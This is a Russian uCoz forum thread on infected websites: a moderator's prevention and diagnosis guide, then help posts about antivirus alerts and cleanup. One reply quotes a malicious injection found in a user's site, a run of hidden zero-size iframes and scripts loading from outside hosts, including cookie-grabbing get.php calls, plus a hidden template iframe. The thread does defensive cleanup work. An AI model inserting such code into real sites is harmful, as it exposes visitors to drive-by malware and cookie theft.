Модератор форума: Yuri_G  
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    SOCHI1014
    Сообщений: 863
    Репутация: 229

    Сообщение # 1186 | 16:11:03
    Цитата webanet ()
    SOCHI1014, на вашем скриншоте идет перенаправление (или то, что доктор назвал перенаправлением с самого на себя. адреса входа и выхода идентичны

    Цитата
    Связался с Dw отправил им запрос буду ждать теперь ответа
    спасибо за понимание

    Пожалуйста посмотрите внимательней

    http://ads.betweendigital.com/adj?ref....s=95262 перенаправляет наhttp://ads.betweendigital.com/ul_cb/adj?ref=&tz=-360&fl=12&pos=atf&w=468&h=60&s=95262

    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1187 | 16:33:54
    SOCHI1014,
    Цитата
    Пожалуйста посмотрите внимательней
    смотрела внимательно. поэтому и удалила часть своего сообщения, чтобы не получить от вас то, что получила, и чтобы не разъяснять дальше. ждите пожалуйста. все будет нормально

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    SOCHI1014
    Сообщений: 863
    Репутация: 229

    Сообщение # 1188 | 16:37:13
    Цитата webanet ()
    SOCHI1014,
    Цитата
    Пожалуйста посмотрите внимательней
    смотрела внимательно. поэтому и удалила часть своего сообщения, чтобы не получить от вас то, что получила, и чтобы не разъяснять дальше. ждите пожалуйста. все будет нормально

    Спасибо.

    dadf
    Сообщений: 1
    Репутация: 0

    Сообщение # 1189 | 19:16:36
    Модератор форума, Сайт galabog.ucoz.ru в разделе скачать на компьютер на странице есть красная кнопка скачать. я загрузил в файловый менеджер файл без вируса! и прикрепил к кнопке скачать. нажимаю скачать (красная кнопка) и выходит окно что данный файл может содержать вирусы!!!! Как такое возможно если я загрузить файл (приложение формата exe и он без вируса! помогите убрать окно которое вылетает
    0RJ0
    Сообщений: 208
    Репутация: 68

    Сообщение # 1190 | 20:25:46
    dadf, на все файлы формата exe, загруженные на сервера сайта, ставится автоматическая страница о том, что файл может содержать вирусы. Эта страница сделана для того, чтобы люди немного подумали перед тем, как скачивать файл. Как вариант могу предложить вам заархивировать файл архиватором (например 7-Zip) и залить на сайт. Тогда этой страницы не будет.
    FaithNoMore
    Сообщений: 8
    Репутация: 0

    Сообщение # 1191 | 13:05:19
    Вирусня прёт. Судя по всему, из-за рекламы.
    Цитата из Dr. Web:
    "
    "Object","Threat","Action","Path",""
    "adj?ref=&tz=-240&fl=11&pos=atf&w=468&h=60&s=95262","SCRIPT.Virus","Заблокирован","http://ads.betweendigital.com/adj?ref=&tz=-240&fl=11&pos=atf&w=468&h=60&s=95262"
    "
    Адрес сайта: http://east-basketball.ru/
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1192 | 13:57:45
    FaithNoMore, тот же DR.Web ⇒ //u.to/O-a4Bg

    Вы как клиент DR.Web можете обратится в их поддержку за разъяснением
    Бесплатный номер техподдержки в России: 8-800-333-7932
    Для звонок в не из РФ +7 (495) 789-45-86 (техподдержка)
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1193 | 18:38:54
    FaithNoMore, когда вы обновляли свой антивирус в последний раз?

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    SOCHI1014
    Сообщений: 863
    Репутация: 229

    Сообщение # 1194 | 19:16:56
    Пришло письмо с Dr web

    Сообщение отредактировал SOCHI1014 - Вторник, 25 Мар 2014, 19:25:54
    Pietari8575
    Сообщений: 5
    Репутация: 0

    Сообщение # 1195 | 21:20:09
    Здравствуйте!
    На мой сайт яндекс наложил ограничение, пишет:
    Сайт может угрожать безопасности вашего компьютера или мобильного устройства
    Указывает на главную страницу, надо полагать что весь сайт. Я в шоке

    Сайт: http://peta4ok.3dn.ru

    Что делать?
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1196 | 21:27:37
    Pietari8575, вот образец вредоносного кода

    Код
    <iframe src="http://pluginplus.net/plugins/statistic/statistic_im2.html" style="width: 0px; height: 0px; border: 0px none;"></iframe><iframe src="http://pluginplus.net/plugins/statistic/statistic_all.html" style="width: 0px; height: 0px; border: 0px none;"></iframe><iframe src="http://pluginplus.net/plugins/statistic/statistic_im2.html" style="width: 0px; height: 0px; border: 0px none;"></iframe><iframe src="http://pluginplus.net/plugins/statistic/statistic_all.html" style="width: 0px; height: 0px; border: 0px none;"></iframe><iframe src="http://kinodrug.net/iblock/redsteam.html" style="width: 0px; height: 0px; border: 0px none;"></iframe><iframe src="http://kinodrug.net/iblock/ruiblock.html" style="width: 0px; height: 0px; border: 0px none;"></iframe><iframe src="http://kinodrug.net/iblock/redsteam.html" style="width: 0px; height: 0px; border: 0px none;"></iframe><iframe src="http://kinodrug.net/iblock/ruiblock.html" style="width: 0px; height: 0px; border: 0px none;"></iframe></span></div><script src="https://pluginplus.net/plugins/system/system_im2.js"></script><script src="https://pluginplus.net/plugins/system/system_im2.js"></script><script src="http://pluginplus.net/plugins/reklama/iframe.js" type="text/javascript"></script><script src="http://pluginplus.net/plugins/reklama/clickunder_adv.js" type="text/javascript"></script><script src="http://pluginplus.net/plugins/reklama/teasers.js" type="text/javascript"></script><script src="http://pluginplus.net/plugins/ssa.js" type="text/javascript"></script><script src="http://pluginplus.net/plugins/reklama/iframe.js" type="text/javascript"></script><script src="http://pluginplus.net/plugins/reklama/clickunder_adv.js" type="text/javascript"></script><script src="http://pluginplus.net/plugins/reklama/teasers.js" type="text/javascript"></script><script src="http://pluginplus.net/plugins/ssa.js" type="text/javascript"></script><script src="http://pluginplus.net/cookies_ext/get.php?callback=getValue"></script><script src="http://pluginplus.net/ssa/get.php?site=peta4ok.3dn.ru&callback=getValue2"></script><script src="http://pluginplus.net/cookies_ext/get.php?callback=getValue"></script><script src="http://pluginplus.net/ssa/get.php?site=peta4ok.3dn.ru&callback=getValue2"></script> </div>
    он вшит в материалы на сайте

    пример зараженного материала http://peta4ok.3dn.ru/news/poweriso_5_9_repack_by_cuta/2014-03-22-1838 вы этот материал скопировали откуда то?

    также стоит удалить ифрейм

    Код
    <iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;"   
    src="http://www.for.ucoz.net"> </iframe>
    он в шаблоне

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Pietari8575
    Сообщений: 5
    Репутация: 0

    Сообщение # 1197 | 00:15:43
    Цитата webanet ()
    также стоит удалить ифрейм<iframe style="position:absolute;left:1%;width:0%;top:1%;height:0%;"
    src="http://www.for.ucoz.net"> </iframe>
    он в шаблоне

    1. Где конкретно в шаблоне, найти этот ифрейм?
    Благодарю за оперативную помощь.
    Эту новость размещал "журналист". По Вашей указанной ссылке сумел уже удалить этот код.

    2. Скажите, значит ли это, что, точно также заряжены другие страницы?
    Если да, то, есть ли способ найти их за раз и удалить, к чертовой бабушке :-)

    3. Еще, со вчерашнего дня начал замечать, при входе на сайт, вот такое сообщение моим Антивирусом:

    Заблокирована инфекция URL:http://kinodrug.net/iblock/redsteam.html Заражение:JS:ScriptIP-inf

    [Trj]Он его блокирует, но при следующем входе опять тоже самое.

    Заранее благодарю. С уважением
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1198 | 00:18:48
    Pietari8575,
    Цитата
    3. Еще, со вчерашнего дня начал замечать, при входе на сайт, вот такое сообщение моим Антивирусом:

    Заблокирована инфекция URL:http://kinodrug.net/iblock/redsteam.html Заражение:JS:ScriptIP-inf
    если вы удалили все то, что я сказала, то проблемы быть не должно

    Цитата
    1. Где конкретно в шаблоне, найти этот ифрейм?
    панель управления - дизайн - управление дизайном - страницы сайта - поиском браузера ищем www.for.ucoz.net

    Цитата
    2. Скажите, значит ли это, что, точно также заряжены другие страницы?
    Если да, то, есть ли способ найти их за раз и удалить, к чертовой бабушке :-)

    не знаю. я просмотрела первые две страницы

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1199 | 00:22:36
    Pietari8575, вы не дочистили материал. в полном описании удалили все. а в кратком как было так и осталось все

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Pietari8575
    Сообщений: 5
    Репутация: 0

    Сообщение # 1200 | 01:25:26
    Цитата webanet ()
    iframe

    Вот оно что, даже не подумал об этом. Удалил. Спасибо.


    Добавлено (27 Мар 2014, 01:21:57)
    ---------------------------------------------
    Цитата webanet ()
    панель управления - дизайн - управление дизайном - страницы сайта - поиском браузера ищем www.for.ucoz.net

    Все проверил. Ничего такого не смог найти. Спасибо.


    Добавлено (27 Мар 2014, 01:25:26)
    ---------------------------------------------
    Цитата webanet ()
    не знаю. я просмотрела первые две страницы
    Ну чтоже, будем надеяться что больше нет ЕФРЕЙМОВ. Благодарю
    Сообщение отредактировал Pietari8575 - Четверг, 27 Мар 2014, 01:25:56
    Поиск: